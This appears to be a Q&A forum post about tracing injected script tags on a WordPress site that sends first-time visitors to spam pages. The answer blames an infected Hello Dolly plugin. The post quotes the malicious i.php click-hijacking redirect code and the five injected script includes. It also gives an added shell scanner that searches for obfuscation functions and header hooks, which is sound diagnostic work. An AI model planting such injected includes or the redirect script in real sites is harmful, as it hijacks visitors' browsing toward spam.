Tags: javascript, wordpress, security, spam, malware

How to find the source of unknown script includes in header?


A site running WordPress is opening a spam site in a new tab on the first click for new users. If you go directly to the URL or have visited the site before, the malware does not trigger. If you are a new user and navigate to the page from Google search results, for example, then you will be redirected (through a new tab) to a random spam page. The URL seems to differ each time.

So far I have tried different malware scanners (Sucuri and Wordfence among others) with no result. I have tried disabling all plugins, changing the theme, and updating WordPress. I also tried disabling pre-fetch. The malware is still present.

I have found out that there are five scripts that are getting included in the header somehow. Looking at the source when navigating to the site in Incognito mode through Google results, I can see the references present. Scripts loaded in the header:

<script type='text/javascript' src='https://longtailmagic.com/domain/i.php' id='hello_newscript0-js'></script>
<script type='text/javascript' src='https://jadsupport.com/includes/i.php' id='hello_newscript1-js'></script>
<script type='text/javascript' src='https://magaliefonteneau.com/wp-content/i.php' id='hello_newscript2-js'></script>
<script type='text/javascript' src='http://futuracp.com/images/i.php' id='hello_newscript3-js'></script>
<script type='text/javascript' src='http://casualwoodcreations.com/images/i.php' id='hello_newscript4-js'></script>

All five seem to be random pages running WordPress, serving the same malicious script. Looking at event listeners, I see i.php:7 under click.

Inspecting the i.php served from one of the sites, it has the following:

// Probe that localStorage is available, then run only for visitors
// who have not clicked before (no 'click' flag stored yet).
localStorage.setItem('test', 'testValue');

if ((localStorage.getItem('test') !== null) && (localStorage.getItem('click') == null)) {

    var click_r = false;
    document.addEventListener("click", function () {

        // Fire once per visitor: set a 100-day cookie and a localStorage flag,
        // then open the spam page in a new tab.
        if (click_r == false) {
            var date = new Date();
            date.setTime(date.getTime() + (100 * 24 * 60 * 60 * 1000));
            document.cookie = "a=a; expires=" + date.toGMTString();
            localStorage.setItem('click', 'click');
            window.open("http://etbetrehyheartling.tk/index/?8131599557550");
            click_r = true;
        }
    });
}

Is there a way to find the source of where these script includes are generated and added to the header? The mission is to get rid of the script references, since this seems to be the way to shake off the malware that redirects new users to a spam site. I have tried String Locator with different keywords to get closer to the source, but no luck so far.
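One way to narrow down which file generates the includes, as an added example that is not part of the original question or answer: this shell function assumes a standard WordPress layout under wp-content and flags PHP files that either mention the observed handle prefix (WordPress emits the id `hello_newscript0-js` for a script registered under the handle `hello_newscript0`, so the handle is a good search key when it appears in plain text) or combine a header-injection hook with a common obfuscation call, which is the case String Locator keyword searches miss.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes the WordPress root is
# passed as $1 and that plugins, mu-plugins and themes live under wp-content.
# Prints one line per suspicious PHP file with the counts that triggered it.
scan_wp_includes() {
  root="$1"
  find "$root/wp-content/plugins" "$root/wp-content/mu-plugins" \
       "$root/wp-content/themes" -type f -name '*.php' 2>/dev/null |
  while IFS= read -r f; do
    # 1) the handle prefix seen in the injected <script id="hello_newscriptN-js"> tags
    handle=$(grep -c 'hello_newscript' "$f" || true)
    # 2) hooks and calls that put script tags into the header
    inject=$(grep -cE "add_action\([[:space:]]*['\"]wp_(head|print_scripts|enqueue_scripts)['\"]|wp_(enqueue|register)_script[[:space:]]*\(" "$f" || true)
    # 3) functions typically used to hide the URL or handle string at runtime
    obf=$(grep -cE '(base64_decode|gzinflate|gzuncompress|str_rot13|create_function)[[:space:]]*\(|[^a-zA-Z_]eval[[:space:]]*\(' "$f" || true)
    # Legitimate plugins enqueue scripts too, so only report a header hook when it
    # sits next to obfuscation; a plain-text hit on the handle is reported on its own.
    if [ "$handle" -gt 0 ] || { [ "$inject" -gt 0 ] && [ "$obf" -gt 0 ]; }; then
      printf '%s\thandle=%s inject=%s obfuscation=%s\n' "$f" "$handle" "$inject" "$obf"
    fi
  done
}
```

Files it reports are candidates to inspect by hand; a clean file may still be reported if it legitimately decodes data inside a wp_head hook.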


Solution

  • According to various blogs, it is the Hello Dolly plugin which has been infected. Removing the plugin shall fix the issue. Check the article here: https://wordpress.org/support/topic/suspected-malware/